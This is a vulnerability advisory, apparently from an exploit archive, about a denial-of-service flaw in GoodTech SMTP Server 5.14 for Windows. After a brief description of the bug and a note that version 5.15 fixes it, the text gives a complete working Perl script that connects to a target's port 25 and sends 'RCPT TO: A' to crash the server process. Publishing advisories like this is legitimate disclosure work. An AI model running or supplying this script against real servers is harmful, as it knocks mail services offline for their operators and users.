goodtechDoS.txt

`Summary:  
Denial of Service vulnerability in GoodTech SMTP Server for Windows  
NT/2000/XP version 5.14  
(http://www.goodtechsys.com/)  
  
Details:  
Input to the RCPT TO command is not properly checked and/or filtered.  
Issuing a single character 'A' as an argument to the RCTP TO command  
will cause the smtpd process to die.  
  
Vulnerable Versions:  
GoodTech SMTP Server for Windows NT/2000/XP version 5.14  
  
Patches/Workarounds:  
The vendor has released version 5.15 to patch the affected software.  
It is available at http://www.goodtechsys.com/.  
  
Exploit:  
Run the following PERL script against the server. The process will die.  
  
#===== Start GoodTechSMTPServer_DOS.pl =====  
#  
# Usage: GoodTechSMTPServer_DOS.pl <ip>  
# GoodTechSMTPServer_DOS.pl 127.0.0.1  
#  
# GoodTech SMTP Server for Windows NT/2000/XP version 5.14  
#  
# Download:  
# http://www.goodtechsys.com/  
#  
###########################################################  
  
use IO::Socket;  
use strict;  
  
my($socket) = "";  
  
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],  
PeerPort => "25",  
Proto => "TCP"))  
{  
print "Attempting to kill GoodTech SMTP Server at $ARGV[0]:25...";  
  
sleep(1);  
  
print $socket "HELO moto.com\r\n";  
  
sleep(1);  
  
print $socket "RCPT TO: A\r\n";  
  
close($socket);  
}  
else  
{  
print "Cannot connect to $ARGV[0]:25\n";  
}  
#===== End GoodTechSMTPServer_DOS.pl =====  
  
Discovered by Reed Arvin reedarvin[at]gmail[dot]com  
(http://reedarvin.thearvins.com/)  
`